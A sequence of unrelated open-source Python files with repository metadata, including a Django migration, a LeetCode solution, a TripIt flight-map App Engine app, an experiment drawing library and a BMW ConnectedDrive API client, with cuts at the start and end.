                ('name', models.CharField(max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('ideascale_id', models.IntegerField()),
                ('text', models.TextField()),
                ('datetime', models.CharField(max_length=50)),
                ('positive_votes', models.IntegerField()),
                ('negative_votes', models.IntegerField(null=True)),
                ('comments', models.IntegerField(null=True)),
                ('parent_type', models.CharField(max_length=50)),
                ('parent_id', models.IntegerField()),
                ('url', models.URLField()),
            ],
        ),
        migrations.CreateModel(
            name='Idea',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('ideascale_id', models.IntegerField()),
                ('title', models.CharField(max_length=100)),
                ('text', models.TextField()),
                ('datetime', models.CharField(max_length=50)),
                ('positive_votes', models.IntegerField()),
                ('negative_votes', models.IntegerField(null=True)),
                ('comments', models.IntegerField(null=True)),
                ('url', models.URLField()),
                ('campaign', models.ForeignKey(to='ideascale.Campaign')),
            ],
        ),
        migrations.CreateModel(
            name='Location',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('country', models.CharField(max_length=50)),
                ('city', models.CharField(max_length=50)),
                ('latitude', models.FloatField()),
                ('longitude', models.FloatField()),
            ],
        ),
        migrations.CreateModel(
            name='Vote',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('ideascale_id', models.IntegerField()),
                ('value', models.IntegerField()),
                ('datetime', models.CharField(max_length=50)),
                ('author', models.ForeignKey(to='ideascale.Author')),
                ('idea', models.ForeignKey(to='ideascale.Idea')),
            ],
        ),
        migrations.AlterField(
            model_name='initiative',
            name='name',
            field=models.CharField(max_length=100),
        ),
        migrations.AddField(
            model_name='idea',
            name='location',
            field=models.ForeignKey(to='ideascale.Location'),
        ),
        migrations.AddField(
            model_name='idea',
            name='user',
            field=models.ForeignKey(to='ideascale.Author'),
        ),
        migrations.AddField(
            model_name='comment',
            name='location',
            field=models.ForeignKey(to='ideascale.Location'),
        ),
        migrations.AddField(
            model_name='comment',
            name='user',
            field=models.ForeignKey(to='ideascale.Author'),
        ),
    ]
|
rebearteta/social-ideation
|
ideascale/migrations/0002_auto_20150424_1736.py
|
Python
|
mit
| 4,257
|
import unittest
import utils
# O(nlog(n)) time. O(1) space. Greedy.
class Solution:
    def smallestRangeII(self, a, k):
        """LeetCode 910: each element moves by +k or -k; minimize max-min.

        After sorting, the optimal split raises some prefix by k and lowers
        the suffix by k; try every split point.  O(n log n) time, O(1) space.

        :type a: List[int]
        :type k: int
        :rtype: int
        """
        a.sort()
        lo, hi = a[0], a[-1]
        best = hi - lo
        for left, right in zip(a, a[1:]):
            # Elements up to `left` go up by k; from `right` on go down by k.
            top = max(hi - k, left + k)
            bottom = min(lo + k, right - k)
            best = min(best, top - bottom)
        return best
class Test(unittest.TestCase):
    """Data-driven test: cases come from the JSON file next to this module."""

    def test(self):
        cases = utils.load_test_json(__file__).test_cases

        for case in cases:
            args = str(case.args)
            actual = Solution().smallestRangeII(**case.args.__dict__)
            self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
|
chrisxue815/leetcode_python
|
problems/test_0910.py
|
Python
|
unlicense
| 768
|
'''OpenGL extension EXT.blend_equation_separate
This module customises the behaviour of the
OpenGL.raw.GL.EXT.blend_equation_separate to provide a more
Python-friendly API
Overview (from the spec)
EXT_blend_func_separate introduced separate RGB and alpha blend
factors. EXT_blend_minmax introduced a distinct blend equation for
combining source and destination blend terms. (EXT_blend_subtract &
EXT_blend_logic_op added other blend equation modes.) OpenGL 1.4
integrated both functionalities into the core standard.
While there are separate blend functions for the RGB and alpha blend
factors, OpenGL 1.4 provides a single blend equation that applies
to both RGB and alpha portions of blending.
This extension provides a separate blend equation for RGB and alpha
to match the generality available for blend factors.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/blend_equation_separate.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.EXT.blend_equation_separate import *
### END AUTOGENERATED SECTION
|
D4wN/brickv
|
src/build_data/windows/OpenGL/GL/EXT/blend_equation_separate.py
|
Python
|
gpl-2.0
| 1,198
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import csv
from collections import defaultdict
import webapp2
from webapp2_extras import json
from google.appengine.api import taskqueue
from google.appengine.ext import ndb
import config
from tripit_facade import TripItFacade
AIRPORTS_ID = 1
MATRIX_ID = 2
class BlobModel(ndb.Model):
    # Pickled, compressed payload (the airport list or the weight matrix).
    payload = ndb.PickleProperty(compressed=True)

    @classmethod
    def by_name(cls, name_value):
        """Query blobs by name.

        NOTE(review): BlobModel defines no ``name`` property, and
        ``Model.query(name=...)`` is not a field filter in ndb -- this
        method looks dead or broken; confirm before relying on it.
        """
        return cls.query(name=name_value)
class HomeHandler(webapp2.RequestHandler):
    """Serve the home page rendered from the Jinja template."""

    def get(self):
        # No dynamic values yet; the template receives an empty context.
        template_values = {}
        template = config.JINJA_ENVIRONMENT.get_template('views/home.html')
        self.response.write(template.render(template_values))
class AirportListHandler(webapp2.RequestHandler):
    """Emit the cached airport list as CSV rows of (name, color)."""

    def get(self):
        self.response.headers['Content-Type'] = 'application/csv'
        airports = BlobModel.get_by_id(AIRPORTS_ID)
        # Fixed palette, cycled over the airports in order.
        colors = ['#AF81C9', '#F89A7E', '#F2CA85', '#54D1F1', '#7C71AD', '#445569']
        writer = csv.writer(self.response.out)
        writer.writerow(['name', 'color'])
        for i, value in enumerate(airports.payload):
            writer.writerow([value, colors[i % len(colors)]])
class AirportMatrixHandler(webapp2.RequestHandler):
    """Emit the cached flight-count matrix as JSON."""

    def get(self):
        self.response.content_type = 'application/json'
        matrix = BlobModel.get_by_id(MATRIX_ID)
        self.response.write(json.encode(matrix.payload))
class RawHandler(webapp2.RequestHandler):
    """Fetch flight segments from TripIt live and dump them as JSON.

    Debug endpoint: writes nothing when TripIt returns no segments.
    """

    def get(self):
        tripit = TripItFacade(config.TRIPIT_USERNAME, config.TRIPIT_PASSWORD)
        flight_segments = tripit.list_flight_segments()
        if len(flight_segments) > 0:
            self.response.content_type = 'application/json'
            self.response.write(json.encode(flight_segments))
class TripItHandler(webapp2.RequestHandler):
    """GET enqueues a background refresh; POST (task queue) performs it."""

    def get(self):
        logging.info('Scheduling tripit fetch')
        taskqueue.add(url='/tripit/worker')

    def post(self):
        # Pull all flight segments from TripIt.
        tripit = TripItFacade(config.TRIPIT_USERNAME, config.TRIPIT_PASSWORD)
        flight_segments = tripit.list_flight_segments()
        logging.info('Flight segments retrieved!')
        # Count flights per (origin, destination) pair and collect airports.
        airports = set()
        matrix = defaultdict(int)
        for s in flight_segments:
            origin, destination = s['start_airport_code'], s['end_airport_code']
            matrix[origin, destination] += 1
            airports.add(origin)
            airports.add(destination)
        airports = list(airports)  # to guarantee order
        # Expand the sparse counter into a dense square matrix aligned with
        # the airports list (rows = origin, columns = destination).
        weights = []
        for i in airports:
            current_line = [0] * len(airports)
            for j, value in enumerate(airports):
                current_line[j] = matrix[i, value]
            weights.append(current_line)
        # Only overwrite the datastore blobs when we actually got data.
        if len(weights) > 0:
            tripit_airport = BlobModel(id=AIRPORTS_ID, payload=airports)
            tripit_airport.put()
            tripit_matrix = BlobModel(id=MATRIX_ID, payload=weights)
            tripit_matrix.put()
            logging.info('Updated datastore entries with matrix and airport information')
        else:
            logging.error('Ignoring datastore update due to missing information, check log for errors')
# URL routes.  Both /tripit/schedule and /tripit/worker map to TripItHandler:
# a GET on either enqueues the task, and the task queue POSTs to do the work.
app = webapp2.WSGIApplication([
    ('/', HomeHandler),
    ('/airports/matrix.json', AirportMatrixHandler),
    ('/airports/list.csv', AirportListHandler),
    ('/tripit/schedule', TripItHandler),
    ('/tripit/worker', TripItHandler),
    ('/tripit/raw', RawHandler)
], debug=True)
|
mcascallares/hand-luggage
|
main.py
|
Python
|
apache-2.0
| 4,034
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from tempest_lib.cli import base
class ClientTestBase(base.ClientTestBase):
    """This is a first pass at a simple read only python-heatclient test.

    This only exercises client commands that are read only.

    This should test commands:
    * as a regular user
    * as an admin user
    * with and without optional parameters
    * initially just check return codes, and later test command outputs
    """

    def _get_clients(self):
        """Build a CLIClient configured from the OS_* environment variables."""
        # Location of the heat executable; defaults to the tox functional venv.
        cli_dir = os.environ.get(
            'OS_HEATCLIENT_EXEC_DIR',
            os.path.join(os.path.abspath('.'), '.tox/functional/bin'))

        return base.CLIClient(
            username=os.environ.get('OS_USERNAME'),
            password=os.environ.get('OS_PASSWORD'),
            tenant_name=os.environ.get('OS_TENANT_NAME'),
            uri=os.environ.get('OS_AUTH_URL'),
            cli_dir=cli_dir)

    def heat(self, *args, **kwargs):
        """Shortcut: run a `heat` CLI command via the configured client."""
        return self.clients.heat(*args, **kwargs)
|
ecerulm/python-heatclient
|
heatclient/tests/functional/base.py
|
Python
|
apache-2.0
| 1,527
|
from expy import shared
from expy.colors import *
from expy.io import sendTrigger
# Re-export the numpy and math modules held by the shared experiment state
# so the drawing helpers below can use them without importing again.
np = shared.np
math = shared.math
def getPos(x=shared.win_width // 2, y=shared.win_height // 2, w=0, h=0, anchor_x='center', anchor_y='center'):
    '''
    Convert an object description to absolute screen coordinates.

    Parameters
    ----------
    x: float or int (default: shared.win_width // 2)
        Float values are relative offsets (-1~1) from the screen center;
        int values are absolute pixel offsets from the screen origin.
    y: float or int (default: shared.win_height // 2)
        Similar with x
    w: float or int (default: 0)
        Values below 1 are taken as a proportion of the screen width,
        otherwise as a width in pixels.
    h: float or int (default: 0)
        Similar with w, relative to the screen height.
    anchor_x: str (default:'center')
        Which point of the object the given x refers to.
        Options: 'center', 'left', or 'right'.
    anchor_y: str (default:'center')
        Which point of the object the given y refers to.
        Options: 'center', 'top', or 'bottom'.

    Returns
    -------
    (x, y, w, h) as ints when w > 0, otherwise (x, y):
        The position of the object's lowerleft corner (and its size).
    '''
    # Map relative (-1~1 float) coordinates onto absolute pixels.
    if type(x) is float:
        x = (0.5 + x / 2) * shared.win_width
    if type(y) is float:
        y = (0.5 + y / 2) * shared.win_height
    # Sizes below one pixel are interpreted as screen proportions.
    if w < 1:
        w *= shared.win_width
    if h < 1:
        h *= shared.win_height
    # Shift from the requested anchor point to the lower-left corner.
    x_shift = {'center': w / 2, 'right': w, 'left': 0}
    y_shift = {'center': h / 2, 'top': h, 'bottom': 0}
    if anchor_x not in x_shift or anchor_y not in y_shift:
        raise ValueError('Unsupported position benchmark')
    x -= x_shift[anchor_x]
    y -= y_shift[anchor_y]
    if w > 0:
        return int(x), int(y), int(w), int(h)
    return int(x), int(y)
def drawText(text, font=shared.default_font, size='stim_font_size', color=C_white, rotation=0, x=0.0, y=0.0, anchor_x='center', anchor_y='center', show_now=True, display=True, timeit=False, trigger=None):
    '''
    Draw text with complex format on the canvas. The text will show as multiple lines split by the '\n'.

    Parameters
    ----------
    text: str
        The content of text.
    font: str (default: shared.default_font)
        The font name of text.
    size: int, or str (default: 'stim_font_size')
        The font size of text, you can either use a number or a pre-defined number name.
    color: RGB tuple, or pre-defined variable (default: C_white)
        The font color of text, you can either use an RGB value or a pre-defined color name.
        The pre-defined colors include C_black, C_white, C_red, C_lime, C_blue, C_yellow, C_aqua, C_fuchsia, C_silver, C_gray, C_maroon, C_olive, C_green, C_purple, C_teal, C_navy.
    rotation: int (default: 0)
        The rotation angle of text.
    x: int, or float (default: 0.0)
        The x coordinate of text. If x is int, the coordinate would be pixel number to the left margin of screen; If x is float (-1~1), the coordinate would be percentage of half screen to the screen center.
    y: int, or float (default: 0.0)
        The y coordinate of text. Similar with x.
    anchor_x: str (default: 'center')
        The position benchmark on this object to the given x.
        Options: 'center', 'left', or 'right'.
    anchor_y: str (default: 'center')
        The position benchmark on this object to the given y.
        Options: 'center', 'top', or 'bottom'.
    show_now: True(default), False
        If True, the function will put the canvas onto the screen immediately (with a potential delay);
        otherwise, the canvas will be put until `show` function.
    (beta testing) trigger: (content, mode)
    (beta testing) timeit: True, False (default)

    Returns
    -------
    (width, height): Width and height of the text sprite
    '''
    # Backward compatibility: a False "display" still suppresses the flip.
    if display==False:
        show_now = False
        print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
    'Assign value'
    # Resolve a pre-defined font-size name (a key of shared.font) to pixels.
    if (type(size) is str) and (size in shared.font):
        size = shared.font[size]
    elif (type(size) is int) and (size > 0):
        pass
    else:
        raise ValueError(str(size) + ' cannot be regarded as a font size')
    # NOTE(review): "rotation" is accepted but never applied below — confirm
    # whether rotated text is supposed to be supported.
    x, y = getPos(x, y)
    'Draw'
    if not '\n' in text:
        # Single line: one pyglet label drawn directly at (x, y).
        label = shared.pyglet.text.Label(text,
                                         color=color,
                                         font_name=font, font_size=size,
                                         x=x, y=y,
                                         anchor_x=anchor_x, anchor_y=anchor_y)
        label.draw()
    else:
        # Multi-line text: draw one label per line, vertically centered on y.
        lines = text.split('\n')
        row_spacing = 0.5  # 0.5x row spacing
        # Offset of the whole block so that its center sits on y.
        y_offset_all = - ((1 + row_spacing) * len(lines) -
                          row_spacing) * size / 2
        for ind, target in enumerate(lines):
            y_offset = y_offset_all + (1 + row_spacing) * ind * size
            label = shared.pyglet.text.Label(target,
                                             color=color,
                                             font_name=font, font_size=size,
                                             x=x, y=y - y_offset,
                                             anchor_x=anchor_x, anchor_y=anchor_y)
            label.draw()
    if show_now:
        shared.win.flip()
        # Record stimulus-onset time once, for reaction-time measurement.
        if timeit and not shared.start_tp:
            now = shared.time.time()
            shared.start_tp = now
        if trigger:
            sendTrigger(trigger[0], mode=trigger[1])
        shared.need_update = False
    else:
        # Drawn but not flipped yet; a later show() call must update screen.
        shared.need_update = True
    # Size of the (last drawn) label sprite.
    return label.content_width, label.content_height
def drawRect(w, h, x=0.0, y=0.0, fill=True, color=C_white, width=1, anchor_x='center', anchor_y='center', show_now=True, display=True, timeit=False, trigger=None):
    '''
    Draw a rectangle on the canvas.

    Parameters
    ----------
    w: float or int
        The width of rectangle; a float is a proportion of the screen
        width, an int is a width in pixels.
    h: float or int
        The height of rectangle; similar with w.
    x: int, or float (default: 0.0)
        The x coordinate of rectangle; an int is a pixel offset from the
        screen margin, a float (-1~1) a relative offset from the center.
    y: int, or float (default: 0.0)
        The y coordinate of rectangle; similar with x.
    fill: True(default), False
        Whether to fill the rectangle or draw only its outline.
    color: RGB tuple, or pre-defined variable (default: C_white)
        The color of the rectangle (e.g. C_black, C_white, C_red, ...).
    width: int (default: 1)
        The line width of the outline (used when fill is False).
    anchor_x, anchor_y: str (default: 'center')
        Accepted for API symmetry; note that the rectangle is currently
        always positioned by its center (see the getPos call below).
    show_now: True(default), False
        If True, the function will put the canvas onto the screen.
    (beta testing) trigger: (content, mode)
    (beta testing) timeit: True, False (default)

    Returns
    -------
    None
    '''
    if display == False:
        show_now = False
        print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
    left, bottom, w, h = getPos(x, y, w=w, h=h, anchor_x='center', anchor_y='center')
    right, top = left + w, bottom + h
    # Corner coordinates, counter-clockwise from the lower-left.
    corners = [left, bottom, right, bottom, right, top, left, top]
    if fill:
        # Two triangles covering the quad.
        shared.pyglet.graphics.draw_indexed(4, shared.gl.GL_TRIANGLES,
                                            [0, 1, 2, 0, 2, 3],
                                            ('v2i', corners),
                                            ('c4B', color * 4)
                                            )
    else:
        shared.pyglet.gl.glLineWidth(width)
        # Five vertices: the four corners plus the first one repeated.
        shared.pyglet.graphics.draw(5, shared.gl.GL_LINE_LOOP,
                                    ('v2i', corners + corners[:2]),
                                    ('c4B', color * 5)
                                    )
    if show_now:
        shared.win.flip()
        if timeit and not shared.start_tp:
            shared.start_tp = shared.time.time()
        if trigger:
            sendTrigger(trigger[0], mode=trigger[1])
        shared.need_update = False
    else:
        shared.need_update = True
def drawCircle(r, x=0.0, y=0.0, fill=True, color=C_white, width=1, anchor_x='center', anchor_y='center', show_now=True, display=True, timeit=False, trigger=None):
    '''
    Draw circle on the canvas.

    Parameters
    ----------
    r: int
        The radius of circle in pixel.
    x: int, or float (default: 0.0)
        The x coordinate of circle; an int is a pixel offset from the
        screen margin, a float (-1~1) a relative offset from the center.
    y: int, or float (default: 0.0)
        The y coordinate of circle; similar with x.
    fill: True(default), False
        Whether to fill the circle or draw only its outline.
    color: RGB tuple, or pre-defined variable (default: C_white)
        The color of the circle (e.g. C_black, C_white, C_red, ...).
    width: int (default: 1)
        The line width of the outline (used when fill is False).
    anchor_x, anchor_y: str (default: 'center')
        Accepted for API symmetry; the circle is positioned by its center.
    show_now: True(default), False
        If True, the function will put the canvas onto the screen.
    (beta testing) trigger: (content, mode)
    (beta testing) timeit: True, False (default)

    Returns
    -------
    None
    '''
    if display==False:
        show_now = False
        print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
    x, y = getPos(x, y, anchor_x='center', anchor_y='center')
    if fill:
        # Approximate the disc with a triangle fan; roughly one vertex per
        # pixel of circumference.
        numPoints = int(2 * r * math.pi)
        s = math.sin(2 * math.pi / numPoints)
        c = math.cos(2 * math.pi / numPoints)
        dx, dy = r, 0
        shared.gl.glBegin(shared.gl.GL_TRIANGLE_FAN)
        shared.gl.glColor4f(*color)
        shared.gl.glVertex2f(x, y)
        for i in range(numPoints + 1):
            shared.gl.glVertex2f(x + dx, y + dy)
            # Rotate (dx, dy) by the step angle (2-D rotation matrix).
            dx, dy = (dx * c - dy * s), (dy * c + dx * s)
        shared.gl.glEnd()
    else:
        numPoints = int(2 * r * math.pi)
        verts = []
        for i in range(numPoints):
            angle = math.radians(float(i) / numPoints * 360.0)
            verts += [r * math.cos(angle) + x, r * math.sin(angle) + y]
        circle = shared.pyglet.graphics.vertex_list(numPoints,
                                                    ('v2f', verts),
                                                    ('c4B', color * numPoints))
        shared.gl.glClear(shared.pyglet.gl.GL_COLOR_BUFFER_BIT)
        # shared.gl.glColor4b(*color)
        circle.draw(shared.gl.GL_LINE_LOOP)
    if show_now:
        shared.win.flip()
        # Record stimulus-onset time once, consistent with the other draw*
        # functions (previously "timeit" was accepted here but ignored).
        if timeit and not shared.start_tp:
            shared.start_tp = shared.time.time()
        # Send the trigger exactly once (the original duplicated this block
        # and fired the trigger twice per draw).
        if trigger:
            sendTrigger(trigger[0], mode=trigger[1])
        shared.need_update = False
    else:
        shared.need_update = True
def drawPoints(points, color=C_white, size=1, show_now=True, display=True, timeit=False, trigger=None):
    '''
    Draw point(s) on the canvas.

    Parameters
    ----------
    points: list of tuple
        The x-y points list.
        If the x,y are given as float, they would be interpreted as a relative position [-1~+1] to the center of the screen;
        if they are given as int, they would be interpreted as pixel offsets from the lowerleft corner of the screen.
        Examples:
            [(0.0,0.0), (0.5,0), (0.5,0.5)]
    color: RGB tuple, or pre-defined variable (default: C_white)
        The color of the points (e.g. C_black, C_white, C_red, ...).
    size: int (default: 1)
        The size of each point
    show_now: True(default), False
        If True, the function will put the canvas onto the screen.
    (beta testing) trigger: (content, mode)
    (beta testing) timeit: True, False (default)

    Returns
    -------
    None
    '''
    if display==False:
        show_now = False
        print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
    new_points = []
    for x, y in points:
        # Map relative (-1~1 float) coordinates to absolute pixels.  The
        # vertex format below is 'v2i' (integers), so cast explicitly —
        # previously relative coordinates were passed through as floats.
        if type(x) is float:
            x = (0.5 + x / 2) * shared.win_width
        if type(y) is float:
            y = (0.5 + y / 2) * shared.win_height
        new_points += [int(x), int(y)]
    shared.gl.glPointSize(size)
    shared.pyglet.graphics.draw(len(new_points) // 2, shared.gl.GL_POINTS,
                                ('v2i', new_points),
                                ('c4B', color * (len(new_points) // 2))
                                )
    if show_now:
        shared.win.flip()
        if timeit and not shared.start_tp:
            now = shared.time.time()
            shared.start_tp = now
        if trigger:
            sendTrigger(trigger[0], mode=trigger[1])
        shared.need_update = False
    else:
        shared.need_update = True
def drawLines(points, color=C_white, width=1, close=False, show_now=True, display=True, timeit=False, trigger=None):
    '''
    Draw line(s) on the canvas.

    Parameters
    ----------
    points: list of tuple
        The turning x-y points of lines.
        If the x,y are given as float, they would be interpreted as a relative position [-1~+1] to the center of the screen;
        if they are given as int, they would be interpreted as pixel offsets from the lowerleft corner of the screen.
        Examples:
            [(0.0,0.0), (0.5,0), (0.5,0.5)]
    color: RGB tuple, or pre-defined variable (default: C_white)
        The color of the lines (e.g. C_black, C_white, C_red, ...).
    width: int (default: 1)
        The width of each line
    close: True, False(default)
        Whether to connect the last point with the first one.
        If True, a polygon can be drawn.
    show_now: True(default), False
        If True, the function will put the canvas onto the screen.
    (beta testing) trigger: (content, mode)
    (beta testing) timeit: True, False (default)

    Returns
    -------
    None
    '''
    if display==False:
        show_now = False
        print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
    new_points = []
    if close:
        # Close the polygon on a copy: the original used "points += ..."
        # which silently grew the caller's list on every call.
        points = list(points) + [points[0]]
    for x, y in points:
        # Map relative (-1~1 float) coordinates to absolute pixels.  The
        # vertex format below is 'v2i' (integers), so cast explicitly —
        # previously relative coordinates were passed through as floats.
        if type(x) is float:
            x = (0.5 + x / 2) * shared.win_width
        if type(y) is float:
            y = (0.5 + y / 2) * shared.win_height
        new_points += [int(x), int(y)]
    shared.pyglet.gl.glLineWidth(width)
    shared.pyglet.graphics.draw(len(new_points) // 2, shared.gl.GL_LINE_STRIP,
                                ('v2i', new_points),
                                ('c4B', color * (len(new_points) // 2))
                                )
    if show_now:
        shared.win.flip()
        if timeit and not shared.start_tp:
            now = shared.time.time()
            shared.start_tp = now
        if trigger:
            sendTrigger(trigger[0], mode=trigger[1])
        shared.need_update = False
    else:
        shared.need_update = True
def drawPic(path, w=0, h=0, x=0.0, y=0.0, rotate=0, anchor_x='center', anchor_y='center', show_now=True, display=True, timeit=False, trigger=None):
    '''
    Draw loaded image on the canvas.

    Parameters
    ----------
    path: str
        The file path of target image
    w: int(default:0), or float
        The width of image.
        If w is float, it represents the width scale on screen;
        if int, it represents the width in pixel.
    h: int(default:0), or float
        The height of image.
        If h is float, it represents the height scale on screen;
        if int, it represents the height in pixel.
    x: int, or float (default:0.0)
        The x coordinate of image.
        If x is int, the coordinate would be pixel number to the left margin of screen;
        If x is float (-1~1), the coordinate would be percentage of half screen to the screen center.
    y: int, or float (default:0.0)
        The y coordinate of image.
        If y is int, the coordinate would be pixel number to the upper margin of screen;
        If y is float (-1~1), the coordinate would be percentage of half screen to the screen center.
    rotate: int (default:0)
        The rotation angle of object.
    anchor_x: str (default:'center')
        The position benchmark on this object to the given x.
        Options: 'center', 'left', or 'right'.
    anchor_y: str (default:'center')
        The position benchmark on this object to the given y.
        Options: 'center', 'top', or 'bottom'.
    show_now: True(default), False
        If True, the function will put the canvas onto the screen.
    (beta testing) trigger: (content, mode)
    (beta testing) timeit: True, False (default)

    Returns
    -------
    None
    '''
    if display==False:
        show_now = False
        print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
    im = shared.pyglet.image.load(path)
    # NOTE(review): float sizes use the position-style mapping
    # (0.5 + w/2) * screen, not the plain "scale * screen" used by getPos —
    # this disagrees with the docstring's "width scale"; confirm intent.
    if type(w) is float:
        w = (0.5 + w / 2) * shared.win_width
    if type(h) is float:
        h = (0.5 + h / 2) * shared.win_height
    if w > 0 and h > 0:
        # Explicit size given: resample the texture to (w, h).
        im = im.get_texture()
        shared.gl.glTexParameteri(
            shared.gl.GL_TEXTURE_2D,
            shared.gl.GL_TEXTURE_MAG_FILTER,
            shared.gl.GL_NEAREST)
        im.width = w
        im.height = h
    else:
        # No size given: keep the image's native dimensions.
        w, h = im.width, im.height
    # NOTE(review): "rotate" is accepted but never applied below — confirm
    # whether rotated images are supposed to be supported.
    x, y, w, h = getPos(x, y, w, h, anchor_x=anchor_x, anchor_y=anchor_y)
    im.blit(x, y, 0)
    if show_now:
        shared.win.flip()
        # Record stimulus-onset time once, for reaction-time measurement.
        if timeit and not shared.start_tp:
            now = shared.time.time()
            shared.start_tp = now
        if trigger:
            sendTrigger(trigger[0], mode=trigger[1])
        shared.need_update = False
    else:
        shared.need_update = True
|
ray306/expy
|
stim/draw.py
|
Python
|
gpl-3.0
| 19,988
|
"""
Faça agora o contrário, de Fahrenheit para Celsius.
Converta uma temperatura digitada em Celsius para Fahrenheit. F = 9*C/5 + 32
"""
import sys
a = input('Digite uma temperatura em Graus Fahrenheit\n')
try:
fahreinheit = int(a)
except ValueError:
try:
fahreinheit = float(a)
except ValueError:
print('Precisa ser um número')
sys.exit(0)
celsius = float(5 / 9 * (fahreinheit - 32))
print("O valor desta temperatura em Celsius é de %.2f ºc" % celsius)
|
alexisbrabo/python_para_zumbis
|
lista_de_exercicios_1/8.py
|
Python
|
gpl-3.0
| 529
|
#! /usr/bin/env python
#
# Use the BMW ConnectedDrive API using credentials from credentials.json
# You can see what should be in there by looking at credentials.json.sample.
#
# 'auth_basic' is the base64-encoded version of API key:API secret
# You can capture it if you can intercept the traffic from the app at
# the time when reauthentication is happening.
#
# Based on the excellent work by Terence Eden:
# https://github.com/edent/BMW-i-Remote
import json
import requests
import time
# API Gateway host per region:
#   North America: b2vapi.bmwgroup.us
#   Rest of World: b2vapi.bmwgroup.com
#   China:         b2vapi.bmwgroup.cn:8592
SERVER = "b2vapi.bmwgroup.us"
AUTH_URL = 'https://' + SERVER + '/gcdm/oauth/token'
API_ROOT_URL = 'https://' + SERVER + '/webapi/v1'
# What are we pretending to be? Not sure if this is important.
# Might be tied to OAuth consumer (auth_basic) credentials?
USER_AGENT = "MCVApp/1.5.2 (iPhone; iOS 9.1; Scale/2.00)"
# USER_AGENT = "Dalvik/2.1.0 (Linux; U; Android 5.1.1; Nexus 6 Build/LMY48Y)"
# Unit-conversion constants.
# To convert km to miles:
#   miles = km * KM_TO_MILES
KM_TO_MILES = 0.621371
# To convert kWh/100Km to Miles/kWh:
#   1 / (EFFICIENCY * avgElectricConsumption)
EFFICIENCY = 0.01609344
# For future use
class ConnectedDriveException(Exception):
    """Base exception for ConnectedDrive API errors (not raised yet)."""
    pass
class ConnectedDrive(object):
    """
    A wrapper for the BMW ConnectedDrive API used by mobile apps.
    Caches credentials in credentials_file, so needs both read
    and write access to it.
    """
    def __init__(self, credentials_file='credentials.json'):
        # Load cached credentials; the file must contain username,
        # password, auth_basic, access_token and token_expiry.
        self.credentials_file = credentials_file
        with open(self.credentials_file,"r") as cf:
            credentials = json.load(cf)
        self.username = credentials["username"]
        self.password = credentials["password"]
        self.auth_basic = credentials["auth_basic"]
        self.access_token = credentials["access_token"]
        self.token_expiry = credentials["token_expiry"]
        # If the access_token has expired, generate a new one and use that
        if (time.time() > self.token_expiry):
            self.generateCredentials()
    def generateCredentials(self):
        """
        If previous token has expired, create a new one from basics,
        using the OAuth resource-owner password grant, and persist it.
        """
        headers = {
            "Authorization": "Basic " + self.auth_basic,
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": USER_AGENT
        }
        data = {
            "grant_type": "password",
            "username": self.username,
            "password": self.password,
            "scope": "remote_services vehicle_data"
        }
        r = requests.post(AUTH_URL, data=data, headers=headers)
        json_data = r.json()
        # Get the access token and its absolute expiry time.
        self.access_token = json_data["access_token"]
        self.token_expiry = time.time() + json_data["expires_in"]
        # Persist immediately so later runs reuse the fresh token.
        self.saveCredentials()
    def saveCredentials(self):
        """
        Save current state to the JSON file.
        """
        credentials = {
            "username": self.username,
            "password": self.password,
            "auth_basic": self.auth_basic,
            "access_token": self.access_token,
            "token_expiry": self.token_expiry
        }
        # Open a file for writing
        with open(self.credentials_file, "w") as credentials_file:
            json.dump(credentials, credentials_file, indent=4)
    def call(self, path, post_data=None):
        """
        Call the API at the given path.
        Argument should be relative to the API base URL, e.g:
            print c.call('/user/vehicles/')
        If a dictionary 'post_data' is specified, the request will be
        a POST, otherwise a GET.  Returns the decoded JSON response.
        """
        # Refresh the bearer token first if it has expired.
        if (time.time() > self.token_expiry):
            self.generateCredentials()
        headers = {"Authorization": "Bearer " + self.access_token,
                   "User-Agent":USER_AGENT}
        if post_data is None:
            r = requests.get(API_ROOT_URL + path, headers=headers)
        else:
            r = requests.post(API_ROOT_URL + path, headers=headers, data=post_data)
        return r.json()
    def executeService(self, vin, serviceType):
        """
        Post a request for the specified service. e.g.
            print c.executeService(vin, 'DOOR_LOCK')
        """
        return self.call("/user/vehicles/{}/executeService".format(vin),
                         {'serviceType': serviceType})
# A simple test example: dump the info and status of the first vehicle.
# (Python 2 syntax — this module uses print statements.)
def main():
    c = ConnectedDrive()
    print "\nVehicle info"
    resp = c.call('/user/vehicles/')
    car = resp['vehicles'][0]
    for k,v in car.items():
        print " ",k, " : ", v
    print "\nVehicle status"
    status = c.call("/user/vehicles/{}/status".format(car['vin']))['vehicleStatus']
    for k,v in status.items():
        print " ", k, " : ", v
if __name__ == '__main__':
